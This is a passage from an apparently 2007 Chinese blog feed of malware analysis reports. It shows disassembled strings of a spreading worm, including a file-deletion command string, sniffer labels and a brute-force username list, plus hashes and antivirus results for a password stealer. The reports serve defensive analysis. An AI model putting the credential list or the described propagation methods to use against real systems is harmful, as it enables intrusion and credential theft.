___:00433EE4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db ':o &amp;del /F /Q o &amp;%s',0Dh,0Ah,0<br>
___:00433F54 s_221GoodbyeHap db '221 Goodbye happy r00ting.',0Ah,0<br>
___:00433F54&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: ___:0040F952 o<br>
___:00433F70 s_425CanTOpenDa db '425 Can',27h,'t open data connection.',0Ah,0<br>
<font color="#ff0000"><strong>PS：不知道为什么会有VNC，难道VNC又出了漏洞？</strong></font></div>
<div forimg="1"><strong><font color="#ff0000"></font></strong></div>
<div forimg="1"><strong><font color="#000000">使用嗅探抓包原理来获取用户名和密码</font></strong></div>
<div forimg="1">___:00436EA8 s_IrcSniff&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'IRC sniff',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_412FC2+5 o<br>
___:00436EB2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
___:00436EB4 s_Pass_0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'PASS ',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_413038+73 o<br>
___:00436EBA&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
___:00436EBC s_User_2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'USER ',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_413038+62 o<br>
___:00436EC2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
___:00436ED4 s_FtpSniff&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'FTP sniff',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_413038+5 o<br>
___:00436F14 s_HttpSniff&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'HTTP sniff',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4130BF+5 o</div>
<div forimg="1">___:00436F50 s_VulnSniff&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'VULN sniff',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_413146+5 o</div>
<div forimg="1">
<div forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/renlangliu/pic/item/2674840ab8729b1a95ca6be6.jpg"></div>
<div forimg="1"><strong>结束以下进程：</strong></div>
<div forimg="1">
<div forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/renlangliu/pic/item/2674840ab80a9b1a95ca6bee.jpg"></div>
<div forimg="1">
<div forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/renlangliu/pic/item/6d15a0192580094043a9adef.jpg"></div>
<div forimg="1"><strong>修改host文件（本机未实现）</strong></div>
<div forimg="1"><strong>
<div forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/renlangliu/pic/item/949ea78fe9242aebf01f36d2.jpg"></div>
<div forimg="1">
<div forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/renlangliu/pic/item/795799826c71f495f603a6d3.jpg"></div>
</div>
</strong></div>
<div forimg="1"><strong>尝试对NT4.0/2000SP1-SP4/XPSP0SP进行TFTP传播</strong></div>
<div forimg="1">
<div forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/renlangliu/pic/item/f505c588756d3991a4c272fc.jpg"></div>
</div>
<div forimg="1"><strong>对以下用户尝试若口令破解</strong></div>
<div forimg="1">___:00429898 s_Oracle&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'oracle',0<br>
___:0042989F&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 10h<br>
___:004298A0 s_Dba&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'dba',0<br>
___:004298A4 s_Database&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'database',0<br>
___:004298AD&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 10h<br>
___:004298B0 s_Default&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'default',0<br>
___:004298B8 s_Guest_0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'guest',0<br>
___:004298BE&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 10h<br>
___:004298C0 s_Wwwadmin&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'wwwadmin',0<br>
___:004298C9&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
___:004298CC s_Teacher&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'teacher',0<br>
___:004298D4 s_Student&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'student',0<br>
___:004298DC s_Owner&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'owner',0<br>
___:004298E2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
___:004298E4 s_Computer&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'computer',0<br>
___:004298ED&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 10h<br>
___:004298F0 s_Root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'root',0<br>
___:004298F5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
___:004298F8 s_Staff&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'staff',0<br>
___:004298FE&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 10h<br>
___:00429900 s_Admin&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'admin',0<br>
___:00429906&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
___:00429908 s_Admins&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'admins',0<br>
___:0042990F&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 10h<br>
___:00429910 s_Administrat&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'administrat',0<br>
___:0042991C s_Administrateu db 'administrateur',0<br>
___:0042992B&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
___:0042992C s_Administrador db 'administrador',0<br>
___:0042993A&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
___:0042993C s_Administrat_0 db 'administrator',0<br>
<font color="#0000ff"><strong>密码为a-z多个常用单词，系统名称、数字、年月</strong></font></div>
<div forimg="1"><strong>病毒利用众多漏洞传播</strong></div>
<div forimg="1">
<div forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/renlangliu/pic/item/3defb70f8fa445e8ab6457c1.jpg"></div>
<div forimg="1"><strong>病毒运行后网速急速减慢，低配置计算机可能会出现死机现象，测试两分钟内开启线程将近150，截图：</strong></div>
<div forimg="1">
<div forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/renlangliu/pic/item/526ad55c2351ed46fbf2c0cb.jpg"></div>
<div forimg="1"></div>
<div forimg="1"><strong><font color="#ff0000" size="5">PS：发现该病毒目前流传甚广，杀完又中，写了一个批处理专杀程序，对病毒进行了清除、免疫，欢迎下载使用。</font></strong></div>
<div forimg="1"><strong><font color="#ff0000" size="5">下载地址：<a href="http://rxuancai.136.tofor.com/showdown.asp?soft_id=24">http://rxuancai.136.tofor.com/showdown.asp?soft_id=24</a></font></strong></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/renlangliu/blog/category/%B2%A1%B6%BE%CB%EA%D4%C2">病毒岁月</a>&nbsp;<a href="http://hi.baidu.com/renlangliu/blog/item/d73ed9805484cbd69123d99a.html#comment">查看评论</a>]]></description>
        <pubDate>2007-05-28  22:52</pubDate>
        <category><![CDATA[病毒岁月]]></category>
        <author><![CDATA[renlangliu]]></author>
		<guid>http://hi.baidu.com/renlangliu/blog/item/d73ed9805484cbd69123d99a.html</guid>
</item>

<item>
        <title><![CDATA[[原创]病毒分析报告：ws2ifsl.sys/avp.exe/tf6sound.dll]]></title>
        <link><![CDATA[http://hi.baidu.com/renlangliu/blog/item/fbc2c258bf0eaa80800a1897.html]]></link>
        <description><![CDATA[
		
		<p><strong>样本名称：</strong>1.exe</p>
<p><br>
<strong>病毒大小：</strong>284,190 字节</p>
<p><br>
<strong>加壳方式：</strong>无</p>
<p><br>
<strong>编写语言：</strong>Borland　Delphi</p>
<p><strong>病毒预警：</strong>2级</p>
<p><br>
<strong>病毒指纹：</strong><br>
SHA-160&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : CB929DBB1929477A851DB06A54D1EA96FA1DFB10<br>
MD5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : 59419C7C3B504A07FF92A7F40826A28F<br>
RIPEMD-160&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : 4E7BEA5F1D676C8C03974EE0FC6685D240F14AE7<br>
CRC-32&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : 731FC41F</p>
<p><strong>文章作者</strong>：[G-AVR]孤单每一天</p>
<p><strong>文章地址：<a href="http://hi.baidu.com/renlangliu/blog/item/fbc2c258bf0eaa80800a1897.html">http://hi.baidu.com/renlangliu/blog/item/fbc2c258bf0eaa80800a1897.html</a></strong></p>
<p><br>
<strong>命名对照：</strong><br>
<a href="http://scanner.virus.org">http://scanner.virus.org</a></p>
<p><br>
<table width="70%" border="0">
<tbody>
    <tr>
        <td>ArcaVir</td>
        <td>1.0.4</td>
        <td>Clean</td>
        <td>3.67603 secs</td>
    </tr>
    <tr>
        <td>avast!</td>
        <td>3.0.0</td>
        <td>Clean</td>
        <td>0.0464969 secs</td>
    </tr>
    <tr>
        <td>AVG Anti Virus</td>
        <td>7.5.47</td>
        <td>Clean</td>
        <td>3.26215 secs</td>
    </tr>
    <tr>
        <td>BitDefender</td>
        <td>7.1</td>
        <td>GenPack:Generic.PWStealer.874D09AB</td>
        <td>5.07662 secs</td>
    </tr>
    <tr>
        <td>CAT QuickHeal</td>
        <td>9.00</td>
        <td>Clean</td>
        <td>5.16741 secs</td>
    </tr>
    <tr>
        <td>ClamAV</td>
        <td>0.90/3311</td>
        <td>Clean</td>
        <td>0.407175 secs</td>
    </tr>
    <tr>
        <td>Dr. Web</td>
        <td>4.33.0</td>
        <td>Trojan.PWS.Maran</td>
        <td>9.5218 secs</td>
    </tr>
    <tr>
        <td>F-PROT</td>
        <td>4.6.7</td>
        <td>Unknown</td>
        <td>0.776782 secs</td>
    </tr>
    <tr>
        <td>F-Secure</td>
        <td>1.02</td>
        <td>Trojan-PSW.Win32.Maran.dy [AVP]</td>
        <td>0.0956321 secs</td>
    </tr>
    <tr>
        <td>H+BEDV AntiVir</td>
        <td>2.1.10-41</td>
        <td>NULL</td>
        <td>5.89765 secs</td>
    </tr>
    <tr>
        <td>McAfee Virusscan</td>
        <td>5.10.0</td>
        <td>PWS-Maran.dll</td>
        <td>3.69338 secs</td>
    </tr>
    <tr>
        <td>NOD32</td>
        <td>2.51.1</td>
        <td>a variant of Win32/PSW.Maran trojan</td>
        <td>2.58767 secs</td>
    </tr>
    <tr>
        <td>Norman Virus Control</td>
        <td>5.70.01</td>
        <td>Clean</td>
        <td>8.68103 secs</td>
    </tr>
    <tr>
        <td>Panda</td>
        <td>9.00.00</td>
        <td>Clean</td>
        <td>0.968208 secs</td>
    </tr>
    <tr>
        <td>Sophos Sweep</td>
        <td>4.17.0</td>
        <td>Mal/Maran-A</td>
        <td>5.94194 secs</td>
    </tr>
    <tr>
        <td>Trend Micro</td>
        <td>8.310-1002</td>
        <td>Clean</td>
        <td>0.515448 secs</td>
    </tr>
    <tr>
        <td>VBA32</td>
        <td>3.12.0</td>
        <td>Clean</td>
        <td>3.77676 secs</td>
    </tr>
    <tr>
        <td>VirusBuster</td>
        <td>1.3.3</td>
        <td>Clean</td>
        <td>2.12044 secs</td>
    </tr>
</tbody>
</table>
</p>
<p><br>
<a href="http://www.virustotal.com">http://www.virustotal.com</a></p>
<p>
<table cellspacing="0" cellpadding="0" width="100%" border="0">
<tbody>
    <tr>
        <td>AhnLab-V3</td>
        <td>2007.5.24.0</td>
        <td align="center">05.28.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>AntiVir</td>
        <td>7.4.0.27</td>
        <td align="center">05.28.2007</td>
        <td class="positivo">TR/PSW.Stealer.284190</td>
    </tr>
    <tr>
        <td>Authentium</td>
        <td>4.93.8</td>
        <td align="center">05.23.2007</td>
        <td class="positivo">could be a corrupted executable file</td>
    </tr>
    <tr>
        <td>Avast</td>
        <td>4.7.997.0</td>
        <td align="center">05.27.2007</td>
        <td class="positivo">Win32:Qhost-AI</td>
    </tr>
    <tr>
        <td>AVG</td>
        <td>7.5.0.467</td>
        <td align="center">05.27.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>BitDefender</td>
        <td>7.2</td>
        <td align="center">05.28.2007</td>
        <td class="positivo">GenPack:Generic.PWStealer.874D09AB</td>
    </tr>
    <tr>
        <td>CAT-QuickHeal</td>
        <td>9.00</td>
        <td align="center">05.26.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>ClamAV</td>
        <td>devel-20070416</td>
        <td align="center">05.28.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>DrWeb</td>
        <td>4.33</td>
        <td align="center">05.28.2007</td>
        <td class="positivo">Trojan.PWS.Maran</td>
    </tr>
    <tr>
        <td>eSafe</td>
        <td>7.0.15.0</td>
        <td align="center">05.27.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>eTrust-Vet</td>
        <td>30.7.3670</td>
        <td align="center">05.28.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>Ewido</td>
        <td>4.0</td>
        <td align="center">05.27.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>FileAdvisor</td>
        <td>1</td>
        <td align="center">05.28.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>Fortinet</td>
        <td>2.85.0.0</td>
        <td align="center">05.28.2007</td>
        <td class="positivo">suspicious</td>
    </tr>
    <tr>
        <td>F-Prot</td>
        <td>4.3.2.48</td>
        <td align="center">05.25.2007</td>
        <td class="positivo">W32/Rootkit-Backdoor-based!Maximus</td>
    </tr>
    <tr>
        <td>F-Secure</td>
        <td>6.70.13030.0</td>
        <td align="center">05.28.2007</td>
        <td class="positivo">Trojan-PSW.Win32.Maran.dy</td>
    </tr>
    <tr>
        <td>Ikarus</td>
        <td>T3.1.1.8</td>
        <td align="center">05.28.2007</td>
        <td class="positivo">Generic.PWS.Maran</td>
    </tr>
    <tr>
        <td>Kaspersky</td>
        <td>4.0.2.24</td>
        <td align="center">05.28.2007</td>
        <td class="positivo">Trojan-PSW.Win32.Maran.dy</td>
    </tr>
    <tr>
        <td>McAfee</td>
        <td>5039</td>
        <td align="center">05.25.2007</td>
        <td class="positivo">PWS-Maran.dll</td>
    </tr>
    <tr>
        <td>Microsoft</td>
        <td>1.2503</td>
        <td align="center">05.28.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>NOD32v2</td>
        <td>2293</td>
        <td align="center">05.27.2007</td>
        <td class="positivo">a variant of Win32/PSW.Maran</td>
    </tr>
    <tr>
        <td>Norman</td>
        <td>5.80.02</td>
        <td align="center">05.25.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>Panda</td>
        <td>9.0.0.4</td>
        <td align="center">05.28.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>Prevx1</td>
        <td>V2</td>
        <td align="center">05.28.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>Sophos</td>
        <td>4.18.0</td>
        <td align="center">05.25.2007</td>
        <td class="positivo">Mal/Maran-A</td>
    </tr>
    <tr>
        <td>Sunbelt</td>
        <td>2.2.907.0</td>
        <td align="center">05.26.2007</td>
        <td class="positivo">VIPRE.Suspicious</td>
    </tr>
    <tr>
        <td>Symantec</td>
        <td>10</td>
        <td align="center">05.28.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>TheHacker</td>
        <td>6.1.6.123</td>
        <td align="center">05.25.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>VBA32</td>
        <td>3.12.0</td>
        <td align="center">05.26.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>VirusBuster</td>
        <td>4.3.23:9</td>
        <td align="center">05.27.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>Webwasher-Gateway</td>
        <td>6.0.1</td>
        <td align="center">05.28.2007</td>
        <td class="positivo">
<p>Trojan.PSW.Stealer.284190</p>
</td>
    </tr>
</tbody>
</table>
</p>
<p> </p>
<p><strong><a href="http://hi.baidu.com/renlangliu/blog/item/fbc2c258bf0eaa80800a1897.html"></a></strong></p>
<strong>测试环境：winXPProSP2 实机</strong> 
<p> </p>
